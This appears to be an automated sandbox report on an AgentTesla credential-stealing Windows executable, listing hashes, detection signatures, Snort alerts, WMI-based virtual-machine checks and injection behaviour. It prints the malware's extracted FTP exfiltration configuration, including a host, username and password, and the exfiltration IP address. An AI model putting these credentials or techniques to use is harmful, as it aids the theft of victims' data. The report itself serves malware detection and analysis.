Windows Analysis Report
Q4YODvoYjL.exe

Overview

General Information

Sample Name: Q4YODvoYjL.exe
Original Sample Name: e30c67b19383f259d7414b763049eb2f.exe
Analysis ID: 830848
MD5: e30c67b19383f259d7414b763049eb2f
SHA1: 8a1465b73066cf8642d39c9ef2333d8361e9d177
SHA256: 182086eeecf6f1b4dc82a040a476d947759556513ad63c129604c565cd06cdc3
Tags: AgentTesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • Q4YODvoYjL.exe (PID: 576 cmdline: C:\Users\user\Desktop\Q4YODvoYjL.exe MD5: E30C67B19383F259D7414B763049EB2F)
    • Q4YODvoYjL.exe (PID: 352 cmdline: C:\Users\user\Desktop\Q4YODvoYjL.exe MD5: E30C67B19383F259D7414B763049EB2F)
  • cleanup
Extracted malware configuration: {"Exfil Mode": "FTP", "Host": "ftp://ftp.valvulasthermovalve.cl", "Username": "cva19491@valvulasthermovalve.cl", "Password": "LILKOOLL14!!"}

Yara matches
Source | Rule | Description | Author | Strings
00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: Q4YODvoYjL.exe PID: 352 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Process Memory Space: Q4YODvoYjL.exe PID: 352 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
          No Sigma rule has matched
Snort alert
Timestamp: 03/20/23-18:32:35.384138
Source IP: 192.168.2.5
Destination IP: 190.107.177.239
SID: 2851779
Source Port: 49700
Destination Port: 54926
Protocol: TCP
Classtype: A Network Trojan was detected

Snort alert
Timestamp: 03/20/23-18:32:35.159386
Source IP: 192.168.2.5
Destination IP: 190.107.177.239
SID: 2029927
Source Port: 49699
Destination Port: 21
Protocol: TCP
Classtype: A Network Trojan was detected

          AV Detection

Source: Q4YODvoYjL.exe | ReversingLabs: Detection: 30%
Source: Q4YODvoYjL.exe | Virustotal: Detection: 38%
Source: http://ftp.valvulasthermovalve.cl | URL Reputation: Label: phishing
Source: ftp.valvulasthermovalve.cl | Virustotal: Detection: 13%
Source: Q4YODvoYjL.exe | Joe Sandbox ML: detected
Source: 0.2.Q4YODvoYjL.exe.3fd4f10.8.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.valvulasthermovalve.cl", "Username": "cva19491@valvulasthermovalve.cl", "Password": "LILKOOLL14!!"}
Source: Q4YODvoYjL.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.5:49698 version: TLS 1.2
Source: Q4YODvoYjL.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: kmTG.pdb source: Q4YODvoYjL.exe
Source: Binary string: kmTG.pdbSHA256vL source: Q4YODvoYjL.exe

          Networking

Source: Traffic | Snort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.5:49699 -> 190.107.177.239:21
Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49700 -> 190.107.177.239:54926
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | DNS query: name: api.ipify.org
Source: Joe Sandbox View | ASN Name: SOCCOMERCIALWIRENETCHILELTDACL
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | IP Address: 190.107.177.239
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: global traffic | TCP traffic: 192.168.2.5:49700 -> 190.107.177.239:54926
Source: unknown | FTP traffic detected: 190.107.177.239:21 -> 192.168.2.5:49699
  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
  220-You are user number 3 of 100 allowed.
  220-Local time is now 14:32. Server port: 21.
  220-This is a private system - No anonymous login
  220-IPv6 connections are also welcome on this server.
  220 You will be disconnected after 15 minutes of inactivity.
Source: unknown | Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49698
Source: Q4YODvoYjL.exe, 00000001.00000002.562716771.0000000000C96000.00000004.00000020.00020000.00000000.sdmp, Q4YODvoYjL.exe, 00000001.00000003.352966359.0000000000C92000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
Source: Q4YODvoYjL.exe, 00000001.00000002.563968449.0000000002A6C000.00000004.00000800.00020000.00000000.sdmp, Q4YODvoYjL.exe, 00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ftp.valvulasthermovalve.cl
Source: Q4YODvoYjL.exe, 00000001.00000002.563968449.00000000029F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: Q4YODvoYjL.exe, 00000001.00000002.563968449.00000000029F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
Source: Q4YODvoYjL.exe, 00000001.00000002.563968449.00000000029F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
Source: unknown | DNS traffic detected: queries for: api.ipify.org
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 0_2_011EC844
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 0_2_011EF1F8
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 0_2_011EF1E8
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_00D7A8F8
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_00D7C8B8
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_00D79CE0
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_00D7A028
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_00D759E3
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_00D77F0B
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_0538C78C
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_0538F5B1
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_0538C780
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_0538AA70
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_0538D850
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_06606258
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_06605288
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_06600040
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_0660B8A8
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_06601968
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 1_2_06608840
Source: Q4YODvoYjL.exe, 00000000.00000002.355813847.00000000071C0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameCruiser.dll, vs Q4YODvoYjL.exe
Source: Q4YODvoYjL.exe, 00000000.00000000.297927431.00000000008D8000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamekmTG.exe> vs Q4YODvoYjL.exe
Source: Q4YODvoYjL.exe, 00000000.00000002.356622503.0000000007480000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameOutimurs.dll2 vs Q4YODvoYjL.exe
Source: Q4YODvoYjL.exe, 00000000.00000002.344107634.0000000002C87000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCruiser.dll, vs Q4YODvoYjL.exe
Source: Q4YODvoYjL.exe, 00000000.00000002.344107634.0000000002C87000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename8ca78997-7490-4fc7-ba81-45e30d020943.exe4 vs Q4YODvoYjL.exe
Source: Q4YODvoYjL.exe, 00000000.00000002.344107634.0000000002D17000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCruiser.dll, vs Q4YODvoYjL.exe
Source: Q4YODvoYjL.exe, 00000000.00000002.346823897.0000000003C49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameOutimurs.dll2 vs Q4YODvoYjL.exe
Source: Q4YODvoYjL.exe, 00000000.00000002.346823897.0000000003FA7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename8ca78997-7490-4fc7-ba81-45e30d020943.exe4 vs Q4YODvoYjL.exe
Source: Q4YODvoYjL.exe, 00000001.00000002.562654629.00000000007E8000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Q4YODvoYjL.exe
Source: Q4YODvoYjL.exe, 00000001.00000002.562504272.000000000042C000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilename8ca78997-7490-4fc7-ba81-45e30d020943.exe4 vs Q4YODvoYjL.exe
Source: Q4YODvoYjL.exe | Binary or memory string: OriginalFilenamekmTG.exe> vs Q4YODvoYjL.exe
Source: Q4YODvoYjL.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\Q4YODvoYjL.exe C:\Users\user\Desktop\Q4YODvoYjL.exe
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Process created: C:\Users\user\Desktop\Q4YODvoYjL.exe C:\Users\user\Desktop\Q4YODvoYjL.exe
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Q4YODvoYjL.exe.log
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/1@3/2
Source: Q4YODvoYjL.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: Q4YODvoYjL.exe | Binary or memory string: g.slN
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Q4YODvoYjL.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Q4YODvoYjL.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Code function: 0_2_011ECB36 pushfd ; ret 0_2_011ECB39
Source: initial sample | Static PE information: section name: .text entropy: 7.867913508227014
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe TID: 472 Thread sleep time: -40023s >= -30000s
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe TID: 4320 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe TID: 1352 Thread sleep count: 461 > 30
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Window / User API: threadDelayed 461
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Thread delayed: delay time: 40023
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Thread delayed: delay time: 922337203685477
          Source: Q4YODvoYjL.exe, 00000001.00000003.352966359.0000000000C68000.00000004.00000020.00020000.00000000.sdmp, Q4YODvoYjL.exe, 00000001.00000002.562716771.0000000000C77000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Memory written: C:\Users\user\Desktop\Q4YODvoYjL.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Process created: C:\Users\user\Desktop\Q4YODvoYjL.exe C:\Users\user\Desktop\Q4YODvoYjL.exe
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Users\user\Desktop\Q4YODvoYjL.exe VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
